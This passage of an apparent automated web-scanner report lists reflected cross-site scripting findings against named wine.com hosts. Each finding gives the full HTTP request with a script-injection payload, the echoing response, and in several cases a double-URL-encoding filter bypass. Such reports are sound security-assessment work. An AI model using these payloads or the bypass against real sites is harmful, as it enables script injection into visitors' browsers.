Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:27 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/106551m.jpg?Lo0P=d543d<script>alert(1)</script>111e9e0bcf8 was not found on this server.<P>
...[SNIP]...

1.41. http://cache.wine.com/labels/107565m.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /labels/107565m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 9baf9<script>alert(1)</script>9405d4a9832 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/107565m.jpg?Lo0P=9baf9<script>alert(1)</script>9405d4a9832 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/107565m.jpg?Lo0P=9baf9<script>alert(1)</script>9405d4a9832 was not found on this server.<P>
...[SNIP]...

1.42. http://cache.wine.com/labels/108103m.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /labels/108103m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload ecec6<script>alert(1)</script>f92b23f7eab was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/108103m.jpg?Lo0P=ecec6<script>alert(1)</script>f92b23f7eab HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/108103m.jpg?Lo0P=ecec6<script>alert(1)</script>f92b23f7eab was not found on this server.<P>
...[SNIP]...

1.43. http://cache.wine.com/labels/108138m.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /labels/108138m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 2452f<script>alert(1)</script>e82d9de1399 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/108138m.jpg?Lo0P=2452f<script>alert(1)</script>e82d9de1399 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:30 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/108138m.jpg?Lo0P=2452f<script>alert(1)</script>e82d9de1399 was not found on this server.<P>
...[SNIP]...

1.44. http://cache1.wine.com/ScriptResource.axd [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /ScriptResource.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39cdc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e242cce2072a was submitted in the REST URL parameter 1. This input was echoed as 39cdc"><script>alert(1)</script>242cce2072a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ScriptResource.axd39cdc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e242cce2072a?d=rQ8zHodK4rGVH28jFFCruwhcCtLwiw_HPB4d-VJMNGHuIHOF6FgLMj5O7Ur-6UVWpVfuG8jt-M851ZvndxTa-1l0qjqQTDZj3PDDOTRd6AE1&t=16ab2387 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Mon, 14 Feb 2011 17:16:05 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: cSource=error%5F404; expires=Mon, 14-Feb-2011 19:16:04 GMT; path=/
Set-Cookie: SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; expires=Tue, 14-Feb-2012 17:16:04 GMT; domain=cache1.wine.com; path=/
Set-Cookie: ASPSESSIONIDASQBSASS=JBEBLMIAAGNBIJCDHNBIAJIB; path=/
Content-Length: 33605


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache1.wine.com:80/ScriptResource.axd39cdc"><script>alert(1)</script>242cce2072a?d" value="rQ8zHodK4rGVH28jFFCruwhcCtLwiw%5FHPB4d%2DVJMNGHuIHOF6FgLMj5O7Ur%2D6UVWpVfuG8jt%2DM851ZvndxTa%2D1l0qjqQTDZj3PDDOTRd6AE1" />
...[SNIP]...

1.45. http://cache1.wine.com/WebResource.axd [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /WebResource.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7817ffae689 was submitted in the REST URL parameter 1. This input was echoed as 4e2c8"><script>alert(1)</script>7817ffae689 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /WebResource.axd4e2c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7817ffae689?d=Hv6DbdWs2sIIjykzJEbGPQ2&t=634118940264276101 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Mon, 14 Feb 2011 17:16:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: cSource=error%5F404; expires=Mon, 14-Feb-2011 19:16:04 GMT; path=/
Set-Cookie: SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; expires=Tue, 14-Feb-2012 17:16:04 GMT; domain=cache1.wine.com; path=/
Set-Cookie: ASPSESSIONIDASQBSASS=GBEBLMIAIKKFHEEHLDFBOLNL; path=/
Content-Length: 33517


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache1.wine.com:80/WebResource.axd4e2c8"><script>alert(1)</script>7817ffae689?d" value="Hv6DbdWs2sIIjykzJEbGPQ2" />
...[SNIP]...

1.46. http://cache1.wine.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1219%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ca90fa5de6 was submitted in the REST URL parameter 1. This input was echoed as d1219"><script>alert(1)</script>0ca90fa5de6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.icod1219%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ca90fa5de6 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmc=32446520; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Sun, 13 Feb 2011 14:59:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; expires=Mon, 13-Feb-2012 14:59:54 GMT; domain=cache1.wine.com; path=/
Set-Cookie: ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; path=/
Content-Length: 33266


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache1.wine.com:80/favicon.icod1219"><script>alert(1)</script>0ca90fa5de6" value="" />
...[SNIP]...

1.47. http://cache1.wine.com/images/90PointRatedWineClub.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/90PointRatedWineClub.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 18d8b<script>alert(1)</script>4390c83485c was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/90PointRatedWineClub.jpg?Lo0P=18d8b<script>alert(1)</script>4390c83485c HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 267
Date: Mon, 14 Feb 2011 17:16:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/90PointRatedWineClub.jpg?Lo0P=18d8b<script>alert(1)</script>4390c83485c was not found on this server.<P>
...[SNIP]...

1.48. http://cache1.wine.com/images/WorldWineClub.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/WorldWineClub.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload e4ea9<script>alert(1)</script>0617d3f267a was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/WorldWineClub.jpg?Lo0P=e4ea9<script>alert(1)</script>0617d3f267a HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 260
Date: Mon, 14 Feb 2011 17:16:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/WorldWineClub.jpg?Lo0P=e4ea9<script>alert(1)</script>0617d3f267a was not found on this server.<P>
...[SNIP]...

1.49. http://cache1.wine.com/images/btnSearch.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/btnSearch.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload ba594<script>alert(1)</script>290a086d246 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/btnSearch.gif?Lo0P=ba594<script>alert(1)</script>290a086d246 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; SL_Audience=484|Accelerated|343|1|0; SL_NV1=1|1; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmc=32446520; __utmb=32446520.1.10.1297605361; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 256
Date: Sun, 13 Feb 2011 13:56:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/btnSearch.gif?Lo0P=ba594<script>alert(1)</script>290a086d246 was not found on this server.<P>
...[SNIP]...

1.50. http://cache1.wine.com/images/css/homeNavBot.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/css/homeNavBot.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload a1cb5<script>alert(1)</script>21314e1a19f was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/homeNavBot.gif?Lo0P=a1cb5<script>alert(1)</script>21314e1a19f HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 261
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/homeNavBot.gif?Lo0P=a1cb5<script>alert(1)</script>21314e1a19f was not found on this server.<P>
...[SNIP]...

1.51. http://cache1.wine.com/images/css/homeNavBotDark.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/css/homeNavBotDark.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload c725e<script>alert(1)</script>b0296818725 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/homeNavBotDark.gif?Lo0P=c725e<script>alert(1)</script>b0296818725 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/homeNavBotDark.gif?Lo0P=c725e<script>alert(1)</script>b0296818725 was not found on this server.<P>
...[SNIP]...

1.52. http://cache1.wine.com/images/css/homeNavRtArrow.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/css/homeNavRtArrow.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 9cd12<script>alert(1)</script>cee0b6c74f6 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/homeNavRtArrow.jpg?Lo0P=9cd12<script>alert(1)</script>cee0b6c74f6 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
